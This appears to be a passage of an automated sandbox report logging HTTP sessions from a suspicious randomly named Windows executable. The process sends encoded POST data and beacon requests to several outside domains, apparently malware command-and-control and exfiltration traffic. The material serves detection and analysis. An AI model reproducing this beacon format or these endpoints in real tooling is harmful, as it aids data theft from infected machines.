                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 38 35 57 57 4c 4a 50 42 72 58 69 36 46 4a 44 58 7a 51 31 54 6c 5a 56 4d 7a 45 55 75 69 41 77 39 59 39 48 6d 6c 72 34 4e 55 38 79 6f 30 48 75 56 50 53 30 4e 6d 61 44 54 58 70 34 6a 48 48 4c 71 45 75 2f 51 49 42 6c 41 48 59 75 2f 76 69 47 78 2f 31 32 44 49 37 6a 35 47 7a 2b 6b 37 4c 4d 51 79 59 57 55 2f 59 77 36 35 4a 65 73 48 52 53 48 54 75 6d 74 4f 37 47 74 49 49 76 51 4e 55 56 2b 4a 76 30 32 33 35 6e 48 76 43 57 45 6c 6a 52 32 72 47 30 34 2f 61 6a 34 4b 70 77 63 39 33 4c 34 55 72 2b 66 42 6f 4f 77 47 39 4f 37 78 2f 42 53 4b 4d 57 32 5a 4f 32 33 6d 45 55 4d 73 54 71 78 6e 2b 42 4c 68 78 6f 4d 46 51 47 62 6d 50 63 45 38 7a 72 4a 42 6c 53 55 75 4d 38 64 63 78 48 49 57 51 4d 49 50 54 67 45 4b 35 52 6d 69 6b 6e 48 68 6a 72 61 72 63 50 4b 6c 6c 47 49 54 64 74 50 48 47 46 4a 72 73 6c 56 43 73 30 44 59 44 37 56 39 38 64 68 72 45 33 39 63 63 48 46 7a 70 4d 69 32 7a 6a 78 71 66 50 4b 4c 72 53 51 6a 50 74 38 36 2b 41 46 31 54 68 77 6a 4d 6c 4c 70 35 61 44 58 72 54 6a 70 55 41 38 69 [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=85WWLJPBrXi6FJDXzQ1TlZVMzEUuiAw9Y9Hmlr4NU8yo0HuVPS0NmaDTXp4jHHLqEu/QIBlAHYu/viGx/12DI7j5Gz+k7LMQyYWU/Yw65JesHRSHTumtO7GtIIvQNUV+Jv0235nHvCWEljR2rG04/aj4Kpwc93L4Ur+fBoOwG9O7x/BSKMW2ZO23mEUMsTqxn+BLhxoMFQGbmPcE8zrJBlSUuM8dcxHIWQMIPTgEK5RmiknHhjrarcPKllGITdtPHGFJrslVCs0DYD7V98dhrE39ccHFzpMi2zjxqfPKLrSQjPt86+AF1ThwjMlLp5aDXrTjpUA8iNjHZ1duE0li5ar1GXUTOaaWFe+vkgrGsRWD9R3Pd3wr2UoaPX+7cJA5oy7CLBABNOVmtbIzy1is3T770DVirt85dB7q1iJjUTFe4HMkyf7upG/XJ5db9Wtopr9BJS/ezEK54ySzvBGwEQxnKHpIxIXjDbySblChOuR7Nmlpe043oSTJwSEcXzv+oCfAlH/kTTM+BfY+4QwOBE/euCJQ9C3IMCkcGiItgdHJYhiatyrCcwce/Ao/iZbtEAQZHG4mOto7VwnUeS1b6IQNLsaCl6bdm6Vl9lRo0+7Y/N/8a3pcpHvBZl9WPky8ILKHLQMw1haKFEaUZXdmTF0aQ9rY8fd3XFrtx+RwlzosjBFFPmGhe/Nj47ICYbQiG5HcjGZDnxud+daEsgPeC6GlsgfcMPDhyEdUWOvFXWwLMHrzVhFogLvOlkctQnTKsbzksVCBSS1BqWqjdwLgyVifKXpGnGZcP2ViRm0Jch+P+Yw6EvSXH+0Phahf6uEZVQACoSla7nK7BYdDyI8Px0V5hBs+96XRqNfsw82ou7jkvDHXulgcGju8Gw2RimdbgRiChVNvYOr1oyomHflS54rdIMowVsXWsWG/9TE/NKkuDNpb4P3LJ7KtLdybAaAaKdQLbW0rYpNc7j0ah54O5Dww6uCH62yoZW2/8466Mls [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.4497473.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:29.572024107 CEST520OUTGET /4hiy/?wrRLLPUh=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.weatherbook.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:19:30.017743111 CEST402INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 26 Sep 2024 13:19:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 262
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 72 52 4c 4c 50 55 68 3d 78 37 2b 32 49 38 53 47 73 55 65 63 43 4d 69 53 6a 54 46 62 6c 35 6c 70 36 48 64 63 2b 32 77 31 56 74 69 62 73 4a 74 2f 4d 73 79 4c 33 6b 43 55 61 42 49 52 37 2f 53 47 4a 36 45 6a 52 6b 48 30 4c 4d 32 6b 4b 51 4d 52 4d 71 2f 4f 6e 77 4b 72 38 67 57 69 58 34 72 47 49 42 65 57 76 6f 45 43 72 5a 6d 55 38 36 73 61 75 5a 66 74 42 57 69 63 54 6f 4f 63 4c 5a 6b 3d 26 49 48 3d 42 50 33 50 72 4a 76 48 63 36 4d 58 63 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wrRLLPUh=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&IH=BP3PrJvHc6MXcF"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.4497483.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:35.161873102 CEST792OUTPOST /jvjp/ HTTP/1.1
                                                        Host: www.crowsecurity.cloud
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.crowsecurity.cloud
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.crowsecurity.cloud/jvjp/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 31 5a 52 73 70 62 35 2f 69 51 77 38 53 44 69 4b 54 65 59 64 52 46 6d 55 45 54 39 43 57 4d 35 6d 54 36 43 52 59 49 57 2b 6e 67 70 58 45 68 2b 61 69 76 64 66 73 67 77 44 47 6f 5a 64 33 4c 54 78 2f 73 61 2b 6a 42 51 36 50 6e 38 56 6e 57 78 50 39 44 78 6c 46 66 64 47 4e 68 4d 4b 76 6e 74 52 69 45 2b 35 64 78 4f 69 70 64 66 6e 6a 4d 59 6d 6a 62 65 6e 56 69 70 66 73 6e 33 50 75 68 7a 2f 54 44 6e 38 6c 4b 57 53 78 62 4f 66 53 6a 44 32 31 4b 2f 51 74 6b 79 53 55 2f 75 46 62 6a 46 35 33 6a 65 30 31 65 66 70 71 48 72 54 50 38 59 6d 79 69 51 73 54 75 36 63 4b 66 34 46 72 64 31 2b 6c 51 3d 3d
                                                        Data Ascii: wrRLLPUh=1ZRspb5/iQw8SDiKTeYdRFmUET9CWM5mT6CRYIW+ngpXEh+aivdfsgwDGoZd3LTx/sa+jBQ6Pn8VnWxP9DxlFfdGNhMKvntRiE+5dxOipdfnjMYmjbenVipfsn3Puhz/TDn8lKWSxbOfSjD21K/QtkySU/uFbjF53je01efpqHrTP8YmyiQsTu6cKf4Frd1+lQ==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.4497493.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:37.714678049 CEST812OUTPOST /jvjp/ HTTP/1.1
                                                        Host: www.crowsecurity.cloud
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.crowsecurity.cloud
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.crowsecurity.cloud/jvjp/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 31 5a 52 73 70 62 35 2f 69 51 77 38 54 69 79 4b 56 35 45 64 47 31 6d 54 4b 7a 39 43 59 73 35 69 54 36 4f 52 59 4a 53 75 6d 57 78 58 64 45 43 61 74 4c 78 66 76 67 77 44 4f 49 5a 59 34 72 54 76 2f 73 65 32 6a 46 59 36 50 6e 6f 56 6e 53 31 50 2b 30 74 69 44 66 64 59 59 78 4d 49 72 6e 74 52 69 45 2b 35 64 78 71 49 70 64 48 6e 69 39 49 6d 79 4b 65 6b 63 43 70 63 72 6e 33 50 71 68 7a 37 54 44 6e 4b 6c 4c 4b 38 78 59 6d 66 53 68 4c 32 31 62 2f 58 32 55 79 63 51 2f 76 49 4e 6a 34 68 78 43 76 6d 79 49 50 59 31 30 4b 78 4f 36 4a 38 6a 54 78 37 42 75 65 76 58 59 78 78 6d 65 49 33 2b 51 67 4f 67 6a 43 7a 46 6a 58 59 70 32 6c 41 68 39 4c 48 44 33 6b 3d
                                                        Data Ascii: wrRLLPUh=1ZRspb5/iQw8TiyKV5EdG1mTKz9CYs5iT6ORYJSumWxXdECatLxfvgwDOIZY4rTv/se2jFY6PnoVnS1P+0tiDfdYYxMIrntRiE+5dxqIpdHni9ImyKekcCpcrn3Pqhz7TDnKlLK8xYmfShL21b/X2UycQ/vINj4hxCvmyIPY10KxO6J8jTx7BuevXYxxmeI3+QgOgjCzFjXYp2lAh9LHD3k=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.4497503.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:40.259078026 CEST10894OUTPOST /jvjp/ HTTP/1.1
                                                        Host: www.crowsecurity.cloud
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.crowsecurity.cloud
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.crowsecurity.cloud/jvjp/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 31 5a 52 73 70 62 35 2f 69 51 77 38 54 69 79 4b 56 35 45 64 47 31 6d 54 4b 7a 39 43 59 73 35 69 54 36 4f 52 59 4a 53 75 6d 57 4a 58 42 6d 61 61 73 73 6c 66 75 67 77 44 4e 49 5a 5a 34 72 53 71 2f 6f 36 79 6a 46 63 4d 50 6c 51 56 6d 78 39 50 2f 47 46 69 57 76 64 59 41 42 4d 4c 76 6e 73 4a 69 41 69 39 64 78 61 49 70 64 48 6e 69 2b 41 6d 69 72 65 6b 51 69 70 66 73 6e 33 44 75 68 79 6d 54 44 50 61 6c 4c 65 43 78 6f 47 66 53 42 62 32 79 74 44 58 72 6b 79 4a 64 66 75 62 4e 6a 30 41 78 47 33 55 79 49 54 2b 31 7a 36 78 50 65 49 33 2b 41 46 53 63 74 75 4c 4d 50 64 4f 76 4f 73 74 36 78 67 6d 74 44 33 7a 65 43 75 31 69 47 63 57 35 38 44 36 55 77 63 45 6c 54 64 74 4d 57 61 32 56 70 73 53 6f 4c 35 4d 6b 4a 6e 55 4e 35 36 78 61 53 37 2b 7a 44 31 37 78 4b 2f 74 4b 57 61 7a 46 4e 74 57 50 51 69 48 6d 39 49 69 42 4d 69 52 4d 56 50 47 6d 53 56 50 4f 32 7a 65 36 55 71 55 69 43 66 33 66 49 6a 39 33 76 56 73 48 73 4b 33 69 31 6a 4a 31 52 2b 51 48 74 72 69 37 4f 57 77 30 59 38 6f 36 4a 6f 6b 30 [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=1ZRspb5/iQw8TiyKV5EdG1mTKz9CYs5iT6ORYJSumWJXBmaasslfugwDNIZZ4rSq/o6yjFcMPlQVmx9P/GFiWvdYABMLvnsJiAi9dxaIpdHni+AmirekQipfsn3DuhymTDPalLeCxoGfSBb2ytDXrkyJdfubNj0AxG3UyIT+1z6xPeI3+AFSctuLMPdOvOst6xgmtD3zeCu1iGcW58D6UwcElTdtMWa2VpsSoL5MkJnUN56xaS7+zD17xK/tKWazFNtWPQiHm9IiBMiRMVPGmSVPO2ze6UqUiCf3fIj93vVsHsK3i1jJ1R+QHtri7OWw0Y8o6Jok0Pl6TVDOVtF5CjUi1SEsUAklonpuOLsJ2ByS0Owe6QSkPHvP9vr7MfNFLESIpN096341tPedALlFvgPygiVg2me6u+Bv3V+/62B+WVLcSLVZUjgVp55AofqKrH8f8/RLnX2TnAGTI/BzR3D7jMTz0z9IcLqFcC7g11lSsa4eyhx2vE31H8OdLBsYlHuoaQFD8sJ+zK8Ls3RszNlpdQglnLy448WXFoigLRNP2WypyekLy+fhV1YQlfYW0f2MeWXJkCE/NBTmGJ2vmGwoOKhiiVtxvFST3rVG5iIh213M2cKYROZiyvesuWGQePKWxl3Hi1O7U0ss45DxVlQSw/ygFifTOy0UFdsneGUCOQJ6QqP/rcILonS+1RJxvvc6YSIoyhVdYDh5q3orAKDm6sArme1YphzvRg72amJYTsNVPN0LRjy1mguRZlG378GcOfbS4Wi8gfbSp6TBxmvQi2/UR+4qx1fgHYAk6MYUTAmsSOsw3PdEeM1cW7lBsz5fhlN6HTygpC44Q5kUxYFGJBcAMLNS+5JPUNiiGYHuDyJCXEZUg11cdaj3Z5qaRfmBIwTg7Dijvoo5rf7zZuvYfSOBha06QPakRfOZMToesq1GJKHaAZjwIwV/O45CuH3seJuFk39gFmTKv5HxqXSZ5yWrTFlFIX47OXUtP4v [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.4497513.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:42.803158998 CEST522OUTGET /jvjp/?wrRLLPUh=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.crowsecurity.cloud
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:19:43.270837069 CEST402INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 26 Sep 2024 13:19:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 262
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 72 52 4c 4c 50 55 68 3d 34 62 35 4d 71 76 49 65 6c 41 38 79 65 53 57 4b 44 50 52 49 64 48 65 73 4e 56 35 58 55 72 70 42 54 4a 36 53 54 5a 37 4f 71 56 6c 45 54 30 61 50 34 64 51 47 78 79 4a 38 59 61 6c 31 79 6f 6d 70 2f 72 7a 67 6b 43 6f 43 43 57 56 75 71 52 39 6c 78 47 52 71 43 76 35 37 48 68 35 49 76 6b 35 53 6a 30 6d 44 5a 44 75 65 72 2f 75 6a 76 75 34 7a 6b 62 36 51 5a 69 38 3d 26 49 48 3d 42 50 33 50 72 4a 76 48 63 36 4d 58 63 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wrRLLPUh=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&IH=BP3PrJvHc6MXcF"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.4497523.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:48.498016119 CEST786OUTPOST /p8sm/ HTTP/1.1
                                                        Host: www.inspireplay.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.inspireplay.live
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.inspireplay.live/p8sm/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 74 73 31 52 55 73 37 50 73 74 55 37 43 6e 46 67 30 30 47 33 36 48 34 75 62 32 43 4b 45 77 30 4b 43 6f 62 46 42 5a 45 48 38 43 70 66 6e 51 6f 69 71 59 5a 30 6e 6e 2f 77 6c 31 42 34 4b 57 44 57 36 71 32 2b 69 63 77 66 4d 54 49 78 75 66 31 6d 6a 79 44 59 46 50 32 6e 6b 65 70 50 75 4d 70 54 42 4b 35 55 78 59 76 71 4f 4b 63 72 77 4c 58 4f 73 42 46 47 4c 6c 6d 37 49 52 6e 6b 52 33 77 2f 32 76 49 55 68 76 52 5a 73 64 47 66 77 65 38 72 63 77 43 6d 4a 62 61 71 51 4b 57 43 75 7a 2b 67 77 6b 51 30 61 6b 58 7a 43 45 75 34 61 44 59 74 34 4d 31 36 73 75 67 54 44 2b 43 6a 6b 46 30 39 71 67 3d 3d
                                                        Data Ascii: wrRLLPUh=ts1RUs7PstU7CnFg00G36H4ub2CKEw0KCobFBZEH8CpfnQoiqYZ0nn/wl1B4KWDW6q2+icwfMTIxuf1mjyDYFP2nkepPuMpTBK5UxYvqOKcrwLXOsBFGLlm7IRnkR3w/2vIUhvRZsdGfwe8rcwCmJbaqQKWCuz+gwkQ0akXzCEu4aDYt4M16sugTD+CjkF09qg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.4497533.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:51.054605961 CEST806OUTPOST /p8sm/ HTTP/1.1
                                                        Host: www.inspireplay.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.inspireplay.live
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.inspireplay.live/p8sm/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 74 73 31 52 55 73 37 50 73 74 55 37 42 48 56 67 79 56 47 33 34 6e 34 70 55 57 43 4b 4f 51 30 47 43 6f 48 46 42 62 6f 58 38 77 4e 66 6d 77 59 69 72 64 35 30 71 48 2f 77 75 56 41 7a 55 6d 44 4e 36 71 4c 4a 69 5a 49 66 4d 54 4d 78 75 65 46 6d 6a 68 72 62 48 66 32 70 78 75 70 4a 71 4d 70 54 42 4b 35 55 78 59 71 42 4f 4b 55 72 78 2f 54 4f 2b 30 70 46 43 46 6d 6b 43 78 6e 6b 56 33 77 37 32 76 4a 78 68 75 4d 43 73 62 4b 66 77 65 4d 72 63 69 36 6e 44 62 61 73 55 4b 57 53 68 69 48 56 79 52 30 2b 56 30 50 49 41 6e 6d 6c 53 6c 4a 33 70 39 55 74 2b 75 45 67 65 35 4c 58 70 47 4a 30 78 76 61 4d 31 72 30 43 30 4d 58 62 56 36 49 4a 31 62 61 59 65 6b 41 3d
                                                        Data Ascii: wrRLLPUh=ts1RUs7PstU7BHVgyVG34n4pUWCKOQ0GCoHFBboX8wNfmwYird50qH/wuVAzUmDN6qLJiZIfMTMxueFmjhrbHf2pxupJqMpTBK5UxYqBOKUrx/TO+0pFCFmkCxnkV3w72vJxhuMCsbKfweMrci6nDbasUKWShiHVyR0+V0PIAnmlSlJ3p9Ut+uEge5LXpGJ0xvaM1r0C0MXbV6IJ1baYekA=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.4497543.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:53.871321917 CEST10888OUTPOST /p8sm/ HTTP/1.1
                                                        Host: www.inspireplay.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.inspireplay.live
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.inspireplay.live/p8sm/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 74 73 31 52 55 73 37 50 73 74 55 37 42 48 56 67 79 56 47 33 34 6e 34 70 55 57 43 4b 4f 51 30 47 43 6f 48 46 42 62 6f 58 38 77 46 66 6e 44 51 69 71 37 78 30 72 48 2f 77 6e 31 42 30 55 6d 43 56 36 75 6e 46 69 5a 4d 50 4d 52 45 78 76 38 4e 6d 33 41 72 62 4e 66 32 70 75 2b 70 49 75 4d 70 47 42 4a 52 51 78 59 61 42 4f 4b 55 72 78 2b 6a 4f 38 68 46 46 4f 6c 6d 37 49 52 6e 67 52 33 78 73 32 76 41 4d 68 75 35 33 73 4c 71 66 78 2b 63 72 54 78 43 6e 50 62 61 75 54 4b 58 4e 68 6a 37 38 79 56 56 42 56 33 54 69 41 67 6d 6c 51 77 38 44 73 70 63 37 39 34 63 53 64 75 76 78 6e 56 70 59 2b 64 4b 58 38 5a 55 34 70 73 48 6c 58 37 74 65 74 70 6d 6c 49 77 4f 47 32 55 4c 6e 41 34 35 63 65 2f 59 57 55 75 4d 75 42 2f 6b 4b 79 38 6d 43 65 68 73 38 56 50 53 66 78 51 52 62 65 36 2b 35 51 70 6f 34 6f 44 73 43 31 74 6f 4f 4b 38 41 59 68 41 4c 49 4e 68 45 68 78 54 46 6e 76 2f 73 64 44 32 4f 47 2f 2b 6b 77 4b 78 37 64 76 65 78 72 7a 53 5a 77 58 5a 49 38 7a 35 72 4b 64 49 47 46 68 74 37 35 35 41 72 69 6a [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=ts1RUs7PstU7BHVgyVG34n4pUWCKOQ0GCoHFBboX8wFfnDQiq7x0rH/wn1B0UmCV6unFiZMPMRExv8Nm3ArbNf2pu+pIuMpGBJRQxYaBOKUrx+jO8hFFOlm7IRngR3xs2vAMhu53sLqfx+crTxCnPbauTKXNhj78yVVBV3TiAgmlQw8Dspc794cSduvxnVpY+dKX8ZU4psHlX7tetpmlIwOG2ULnA45ce/YWUuMuB/kKy8mCehs8VPSfxQRbe6+5Qpo4oDsC1toOK8AYhALINhEhxTFnv/sdD2OG/+kwKx7dvexrzSZwXZI8z5rKdIGFht755Arijr0KbpviEmtFjQre+Jfe+OwnSXCDVAXySxeErPwbTPjsuc76sDZybYCEWTiYejiGrNI1C9fTOQGXuVmA6bIZ/+QXSppY0CWtgZzB/erZ1QI667UW7rTCLZV6WLj9KXpOGVlkBSS1ZDihNq7g4vCaa4Ce0OU8gkfhbNlZnHn3Qsl0iXgIGcl6FEoMURhvb1coa0Y3SMWLhI0emsqfBIFZkpMKHLixrkc0AFlT3MdSt/UWoQieB+WKp/QdLRHkEiLH7A28MZZBoqr91WOjZx22OUQ7RJDBT+cRlyBO8cpnGTP3yRs5hJe3RsUA4iDWTPKJpHRMAPN0w/+pZMm0aQBeW/SzuOdeUy/xRLwsS22lxqk8H6SemcwxBK4ug2PaugVBg6QP1t/egTK16B36ChZCBCyeBY06dL2Mk+Q1vF6V3QCm5tW9gbDAa+Ib9HmnGa8ofhirrlC/bdNjo+p9nKHRK3YgMqjZq8tVMWzQktmiJkAK3FAjp4jDwLSl55lfDo2LDXqMyR5jkBhZSS4vC5WIn6DmWcc3rnz1griGTEncxGwCR4lwo5uVbXS5qZYkwN/6y4VxHnp5u1dlvWDvf956CZzcALKc8ZVcVWu9nbWBX24KU2Y02CkgUsyt7iwwYVFYtuCh71CXM48jPRPtLUkCtnYLm4PULLHfNQC [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.4497553.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:56.437766075 CEST520OUTGET /p8sm/?IH=BP3PrJvHc6MXcF&wrRLLPUh=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks= HTTP/1.1
                                                        Host: www.inspireplay.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
